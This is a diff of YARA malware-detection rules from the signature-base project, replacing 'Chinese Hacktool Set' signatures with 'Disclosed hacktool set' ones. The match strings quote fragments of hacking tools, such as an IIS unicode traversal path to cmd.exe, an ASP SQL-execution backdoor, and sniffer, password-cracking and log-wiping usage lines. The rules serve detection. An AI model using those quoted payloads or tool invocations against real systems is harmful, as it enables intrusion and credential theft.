-		$s4 = "SOFTWARE\\Borland\\" ascii
+		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
+		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Cyclotron : FILE
+rule SIGNATURE_BASE_Fpipe2_0
 {
 	meta:
-		description = "Chinese Hacktool Set - file cyclotron.sys"
+		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7099462b-2a72-56cd-8a50-27cd445eb9d2"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1735-L1752"
+		id = "7e104cf6-69d2-590e-8999-4f0d448719f2"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2535-L2553"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
-		logic_hash = "f3a0edf54039479c9f4e46b20249465bbe1bca57f47afeba37965e6e3fc0127f"
-		score = 75
+		hash = "891609db7a6787575641154e7aab7757e74d837b"
+		logic_hash = "b28566315ddda7765dfee722f5ad02c1206c6916363d86407fdc61b53148f511"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Device\\IDTProt" wide
-		$s2 = "IoDeleteSymbolicLink" fullword ascii
-		$s3 = "\\??\\slIDTProt" wide
-		$s4 = "IoDeleteDevice" fullword ascii
-		$s5 = "IoCreateSymbolicLink" fullword ascii
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = " -s    - outbound connection source port number" fullword ascii
+		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s4 = "http://www.foundstone.com" fullword ascii
+		$s19 = "FPipe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Xscan_Gui : FILE
+rule SIGNATURE_BASE_Instgina
 {
 	meta:
-		description = "Chinese Hacktool Set - file xscan_gui.exe"
+		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fee11058-e75f-5d8f-8d10-06dcaed99df1"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1754-L1770"
+		id = "ccbda689-e61a-501d-a8ed-62e3c1c20289"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2555-L2570"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
-		logic_hash = "366db7eb19725a0a42ce371d7bfb50a22a259f0bc0252927af626e8c1c0b9b59"
-		score = 75
+		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
+		logic_hash = "a55a13ced122b9901f0505d585e7a7c984d4231b3507282c1b15ff400ce51265"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
-		$s2 = "www.target.com" fullword ascii
-		$s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
-		$s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
+		$s0 = "To Open Registry" fullword ascii
+		$s4 = "I love Candy very much!!" ascii
+		$s5 = "GinaDLL" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Hscan : FILE
+rule SIGNATURE_BASE_Arttray_Zip_Folder_Arttray
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscan.exe"
+		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "82d9cd61-8cef-56b4-8dfe-a28edaa781b8"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1772-L1792"
+		id = "d29909a4-8663-54c7-8f0e-68b15def869f"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2572-L2588"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
-		logic_hash = "9bc4800249bffcc4b8fc1191d600f0b9b2a7b0c1f067039c83c03671a0b4b5c5"
-		score = 75
+		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
+		logic_hash = "225be71bfd047331399162941edf06c72d2fd1afa04c78cbc51099665f50883b"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
-		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
-		$s3 = "%s -h www.target.com -all" fullword ascii
-		$s4 = ".\\report\\%s-%s.html" fullword ascii
-		$s5 = ".\\log\\Hscan.log" fullword ascii
-		$s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
-		$s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii
-		$s8 = ".\\conf\\mysql_pass.dic" fullword ascii
+		$s0 = "http://www.brigsoft.com" fullword wide
+		$s2 = "ArtTrayHookDll.dll" fullword ascii
+		$s3 = "ArtTray Version 1.0 " fullword wide
+		$s16 = "TRM_HOOKCALLBACK" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Goodtoolset_Pr : FILE
+rule SIGNATURE_BASE_Sig_238_Findoor
 {
 	meta:
-		description = "Chinese Hacktool Set - file pr.exe"
+		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d00e1873-f2a5-5e89-9223-ead418e2667c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1794-L1812"
+		id = "61215a76-8c29-505d-bfef-a5f13fec476c"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2590-L2607"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
-		logic_hash = "0673bc445422f4339c9e81ff8ae8a9b2bb9bc1f107b85fe34906444a1754c43b"
-		score = 75
+		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
+		logic_hash = "223f324ab6b61775d500dc248b9db8363ce915ec279a893a6f0ec92b273a27c0"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "-->Got WMI process Pid: %d " ascii
-		$s2 = "-->This exploit gives you a Local System shell " ascii
-		$s3 = "wmiprvse.exe" fullword ascii
-		$s4 = "Try the first %d time" fullword ascii
-		$s5 = "-->Build&&Change By p " ascii
-		$s6 = "root\\MicrosoftIISv2" fullword wide
+		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
+		$s8 = "PASS hacker@hacker.com" fullword ascii
+		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
+		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
+		$s11 = "http://isno.yeah.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Hydra_7_4_1_Hydra : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Ipclear
 {
 	meta:
-		description = "Chinese Hacktool Set - file hydra.exe"
+		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf692bea-091d-5be0-a012-caba01e96dde"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1814-L1832"
+		id = "71ebecea-721f-5c5d-9997-6a57f070d91c"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2609-L2626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
-		logic_hash = "f52696cbf7355c982d1a1e0c73dce65324845c5ffc13c541e326720332b4788d"
-		score = 75
+		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
+		logic_hash = "49fbe844a99aa8cae25db90e1d8cdeee13c81293bba7b3201afc4748cb0a6a7c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
-		$s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
-		$s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
-		$s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
-		$s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
-		$s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
+		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Srss_2 : FILE
+rule SIGNATURE_BASE_Wineggdropshellfinal_Zip_Folder_Injectt
 {
 	meta:
-		description = "Chinese Hacktool Set - file srss.exe"
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a84fa58-ccd0-5cf0-b1e0-a8f2ca04fd3f"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1834-L1856"
+		id = "16f04551-050f-5a07-a35b-a3a7dbba6803"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2628-L2645"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
-		logic_hash = "e674ac7a99a67e2ebe8b4c4232e3435dd041b794f6c08a87ef7b8179127d6fc7"
-		score = 75
+		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
+		logic_hash = "01840f4df12fbf6f5f27a3050c841002678605cd373e9ea9b182b2026caa29f9"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "used pepack!" fullword ascii
-		$s1 = "KERNEL32.dll" fullword ascii
-		$s2 = "KERNEL32.DLL" fullword ascii
-		$s3 = "LoadLibraryA" fullword ascii
-		$s4 = "GetProcAddress" fullword ascii
-		$s5 = "VirtualProtect" fullword ascii
-		$s6 = "VirtualAlloc" fullword ascii
-		$s7 = "VirtualFree" fullword ascii
-		$s8 = "ExitProcess" fullword ascii
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "2TInject.Dll" fullword ascii
+		$s2 = "Windows Services" fullword ascii
+		$s3 = "Findrst6" fullword ascii
+		$s4 = "Press Any Key To Continue......" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Ntgod : FILE
+rule SIGNATURE_BASE_Gina_Zip_Folder_Gina
 {
 	meta:
-		description = "Chinese Hacktool Set - file NtGod.exe"
+		description = "Disclosed hacktool set (old stuff) - file gina.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2f0733d-5519-5cb8-b077-0ae8472400b4"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1858-L1874"
+		id = "7ebc7218-9c7b-5595-ae7b-f316fc99d1f6"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2647-L2667"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
-		logic_hash = "77b9204add5d25dcc36eabc07cabea2bdc67a23873c2faf7706e7fba5ed53f8b"
-		score = 75
+		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
+		logic_hash = "1344634346f9e7e3ef96c901705ac7bd4aa9a70cfbebf71c8222544e84ca9f98"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\temp\\NtGodMode.exe" ascii
-		$s4 = "NtGodMode.exe" fullword ascii
-		$s10 = "ntgod.bat" fullword ascii
-		$s19 = "sfxcmd" fullword ascii
+		$s0 = "NEWGINA.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s3 = "WlxActivateUserShell" fullword ascii
+		$s6 = "WlxWkstaLockedSAS" fullword ascii
+		$s13 = "WlxIsLockOk" fullword ascii
+		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s16 = "WlxShutdown" fullword ascii
+		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Vnclink : FILE
+rule SIGNATURE_BASE_Superscan3_0
 {
 	meta:
-		description = "Chinese Hacktool Set - file VNCLink.exe"
+		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "270dc14c-ac8f-58c2-b4ac-c10981e20a07"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1876-L1891"
+		id = "d22aa3ae-4c62-5007-896d-7c473f0421a6"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2669-L2690"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cafb531822cbc0cfebbea864489eebba48081aa1"
-		logic_hash = "21328e2a871dfcfda47991a1f1e897efd27471420d644c09a94004cf5b0f9869"
-		score = 75
+		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
+		logic_hash = "448d3af61062c53c5b148e58697537bd98316e6c6d4d9ed9e0ff36cbd5a0b4f5"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\temp\\vncviewer4.log" fullword ascii
-		$s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii
-		$s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii
+		$s0 = "\\scanner.ini" ascii
+		$s1 = "\\scanner.exe" ascii
+		$s2 = "\\scanner.lst" ascii
+		$s4 = "\\hensss.lst" ascii
+		$s5 = "STUB32.EXE" fullword wide
+		$s6 = "STUB.EXE" fullword wide
+		$s8 = "\\ws2check.exe" ascii
+		$s9 = "\\trojans.lst" ascii
+		$s10 = "1996 InstallShield Software Corporation" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 580KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Tools_Ntcmd : FILE
+rule SIGNATURE_BASE_Sig_238_Xsniff
 {
 	meta:
-		description = "Chinese Hacktool Set - file NTCmd.exe"
+		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "db3f28d6-dfe8-5c79-a11b-e31701e250d7"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1893-L1911"
+		id = "1e61a732-8691-5f84-beb0-c9f7e6d46538"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2692-L2713"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
-		logic_hash = "c2487306a0d82ab76a048c001361c25bcd61d0f7a57a3b22df1c70299f0a72ba"
-		score = 75
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+		logic_hash = "90c08db197a00885ffc62967bd814479a438f500316cf65e81fcec617517dd9c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii
-		$s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" fullword ascii
-		$s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii
-		$s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii
-		$s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii
-		$s6 = "NTcmd>" fullword ascii
+		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s3 = "%s - simple sniffer for win2000" fullword ascii
+		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s7 = "http://www.xfocus.org" fullword ascii
+		$s9 = "  -pass        : Filter username/password" fullword ascii
+		$s18 = "  -udp         : Output udp packets" fullword ascii
+		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s20 = "  -tcp         : Output tcp packets" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 2 of them
+		6 of them
 }
-rule SIGNATURE_BASE_Mysql_Pwd_Crack : FILE
+rule SIGNATURE_BASE_Sig_238_Fscan
 {
 	meta:
-		description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
+		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3ddeb1c7-e124-5e9e-abcf-3856e0561165"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1913-L1930"
+		id = "7af4d38a-bc88-57ba-b602-4e01d3d95015"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2715-L2736"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
-		logic_hash = "d272b98a6cf2749482ee501734d0043564ba528770161cb0ed4f032409305f22"
-		score = 75
+		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
+		logic_hash = "0af558345e8c85021fd4f8d399dacb3b6e8d9c692060c31a36e943fc48bfabff"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
-		$s2 = "Successfully --> username %s password %s " fullword ascii
-		$s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
-		$s4 = "-a automode  automatic crack the mysql password " fullword ascii
-		$s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii
+		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
+		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
+		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
+		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
+		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
+		$s13 = "http://www.foundstone.com" fullword ascii
+		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
+		$s18 = "Bind port number out of range. Using system default." fullword ascii
+		$s19 = "fscan.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Cmdshell64 : FILE
+rule SIGNATURE_BASE__Iissample_Nesscan_Twwwscan
 {
 	meta:
-		description = "Chinese Hacktool Set - file CmdShell64.exe"
+		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4d69be7-f717-53f7-873e-86acbb309106"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1932-L1951"
+		id = "a710ca8e-54dc-5a98-b173-c87b22af745f"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2738-L2764"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
-		logic_hash = "fd8010ab2ab51feed62475f840ffaeef92cf1266c139b8f669b7fa5ff646fdab"
-		score = 75
+		logic_hash = "6088dd060507f4efa2f4c1770dc746100966e8a7475859918488d7be6c96bc31"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
+		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
+		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
 
 	strings:
-		$s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide
-		$s2 = "ServiceCmdShell" fullword ascii
-		$s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
-		$s4 = "ServiceSystemShell" fullword wide
-		$s5 = "[Root@CmdShell ~]#" fullword wide
-		$s6 = "Hello Man 2015 !" fullword wide
-		$s7 = "CmdShell" fullword ascii
+		$s0 = "Connecting HTTP Port - Result: " fullword
+		$s1 = "No space for command line argument vector" fullword
+		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
+		$s5 = "No space for copy of command line" fullword
+		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
+		$s8 = "scanf : floating point formats not linked" fullword
+		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
+		$s13 = "!\"what?\"" fullword
+		$s14 = "%s Port %d Closed" fullword
+		$s16 = "printf : floating point formats not linked" fullword
+		$s17 = "xxtype.cpp" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Ms_Viru_V : FILE
+rule SIGNATURE_BASE__Fshttp_Fspop_Fssniffer
 {
 	meta:
-		description = "Chinese Hacktool Set - file v.exe"
+		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88a01e7a-8210-5e0c-a9b8-b7c9b991e16b"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1953-L1971"
+		id = "5ca543af-2589-52b0-83f9-ad25ba76b633"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2766-L2792"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
-		logic_hash = "028b589c11eeacb2edfeeaeaebf2da370e540cba964c9ebbb19e4c734afe190f"
-		score = 75
+		logic_hash = "50c91f1036ae467de51227b6782978c33607f94724d2e1b0af7c958028a84b48"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
+		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
+		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
 
 	strings:
-		$s1 = "c:\\windows\\system32\\command.com /c " fullword ascii
-		$s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii
-		$s3 = "OH,Sry.Too long command." fullword ascii
-		$s4 = "Success! Commander." fullword ascii
-		$s5 = "Hey,how can racle work without ur command ?" fullword ascii
-		$s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii
